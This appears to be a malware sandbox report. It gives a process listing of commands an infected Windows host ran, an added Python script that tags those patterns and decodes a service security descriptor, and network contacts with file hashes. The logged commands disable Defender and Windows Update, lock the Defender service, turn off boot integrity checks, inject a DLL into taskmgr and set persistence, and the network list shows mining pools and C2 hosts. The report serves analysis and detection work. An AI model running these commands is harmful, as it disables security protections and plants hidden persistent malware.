"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Windows\system32\taskeng.exe

taskeng.exe {E350FEEF-DED4-4509-A1C6-23F983541D93} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f
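
The process listing above is raw sandbox output. The Python below is an added example, not part of this report or of any of the malware families it names: it tags a subset of those command lines with triage labels and decodes the security descriptor the `sc sdset WinDefender` line applies. The sample lines in `SAMPLE_CMDLINES` are copied from the listing; the rule names, the `triage` logic and the `TRUSTEES` labels are the example's own. `SERVICE_RIGHTS` is the standard mapping of SDDL two-letter access codes onto service-object rights (the mapping `sc sdshow`/`sc sdset` use).

```python
"""Triage helpers for the command lines listed above (added example)."""
import re

# SDDL two-letter access codes interpreted for a service object.
SERVICE_RIGHTS = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
TRUSTEES = {"SY": "SYSTEM", "BA": "Administrators", "IU": "INTERACTIVE",
            "SU": "SERVICE", "WD": "Everyone"}
# ACE layout: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((A|D|AU);([^;]*);([^;]*);[^;]*;[^;]*;([^)]+)\)")
SDSET_RE = re.compile(r"\bsc\s+sdset\s+(\S+)\s+(D:\S+)", re.I)


def parse_service_dacl(sddl):
    """Yield (ace_type, trustee, {right names}) for every ACE in the D: part."""
    dacl = sddl[sddl.index("D:"):]
    sacl_at = dacl.find("S:(")            # S: is the audit list; not access
    if sacl_at != -1:
        dacl = dacl[:sacl_at]
    for ace_type, _flags, rights, sid in ACE_RE.findall(dacl):
        if rights.startswith("0x"):       # raw access mask: left undecoded
            names = {rights}
        else:
            names = {SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                     for i in range(0, len(rights), 2)}
        yield ace_type, TRUSTEES.get(sid, sid), names


def service_rights_summary(sddl):
    """Rights each trustee keeps: allow ACEs minus deny ACEs.

    Simplification: Windows walks ACEs in order and stops at the first
    decisive one, so a non-canonical DACL can behave differently.
    """
    allowed, denied = {}, {}
    for ace_type, who, rights in parse_service_dacl(sddl):
        if ace_type == "A":
            allowed.setdefault(who, set()).update(rights)
        elif ace_type == "D":
            denied.setdefault(who, set()).update(rights)
    return {who: allowed.get(who, set()) - denied.get(who, set())
            for who in set(allowed) | set(denied)}


def explain_sdset(cmdline):
    """For an `sc sdset <service> <sddl>` line return (service, summary)."""
    m = SDSET_RE.search(cmdline)
    return None if not m else (m.group(1), service_rights_summary(m.group(2)))


# Illustrative labels for the process-creation patterns seen in the listing.
RULES = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("update_service_stop", re.compile(r"\bsc\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("service_key_delete", re.compile(r'reg\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\', re.I)),
    ("service_sddl_change", re.compile(r"\bsc\s+sdset\b", re.I)),
    ("bcd_integrity_off", re.compile(r"bcdedit.*\b(nointegritychecks\s+1|recoveryenabled\s+0)\b", re.I)),
    ("logon_task_highest", re.compile(r'schtasks(?:\.exe"?)?\s+/create\b.*/rl\s+highest', re.I)),
    ("minute_task", re.compile(r'schtasks(?:\.exe"?)?\s+/create\b.*/sc\s+minute', re.I)),
    ("firewall_allow_rule", re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow", re.I)),
    ("sleep_disabled", re.compile(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0", re.I)),
    ("acl_lockdown", re.compile(r'CACLS\s+"[^"]+"\s+/P\s+"[^"]+:N"', re.I)),
    ("browser_kill", re.compile(r"taskkill\s+/IM\s+(chrome|msedge)\.exe\s+/F", re.I)),
]


def classify(cmdline):
    """Names of every rule that matches one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """Map each command line that trips at least one rule to its rule names."""
    return {c: classify(c) for c in cmdlines if classify(c)}


# Copied from the listing above (constructed sample input for the example).
WINDEFENDER_SDSET = (r"sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                     r"(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)"
                     r"(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F',
    r'CACLS "oneetx.exe" /P "Admin:N"',
    r"taskkill /IM chrome.exe /F",
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r"C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1",
    r"powercfg /x -hibernate-timeout-ac 0",
    WINDEFENDER_SDSET,
]

if __name__ == "__main__":
    for line, tags in triage(SAMPLE_CMDLINES).items():
        print(", ".join(tags).ljust(42), line[:70])
    svc, rights = explain_sdset(WINDEFENDER_SDSET)
    print(f"\n{svc}: Administrators keep {sorted(rights['Administrators'])}")
```

Decoding the descriptor is what makes the `sc sdset` line readable: `(D;;WPDT;;;BA)` denies Administrators SERVICE_STOP and SERVICE_PAUSE_CONTINUE, and the BA allow ACE grants neither, so `sc stop WinDefender` fails even from an elevated prompt while SYSTEM keeps STOP. The same decode shows the way out: BA still holds CHANGE_CONFIG, DELETE and WRITE_DAC, so an administrator can overwrite the descriptor with `sc sdset` or delete the service outright. The trailing `S:(AU;FA;...;WD)` is an audit ACE only. The `Add-MpPreference` line deserves the same scrutiny: excluding `$env:UserProfile` and `$env:ProgramFiles` removes both drop locations used by the rest of the chain from Defender scanning.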

Network

Country Destination Domain Proto
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
NL 45.66.230.149:80 45.66.230.149 tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 rcn.tuktuk.ug udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 0af2d590-a373-4ee1-9788-7a25104a8b45.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server3.duniadekho.bar udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun4.l.google.com udp
BG 185.82.216.50:443 server3.duniadekho.bar tcp
JP 172.217.213.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 luckytradeone.com udp
US 104.21.35.252:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 152.228.216.245:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp

Files

memory/1664-54-0x0000000001200000-0x000000000165A000-memory.dmp

\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

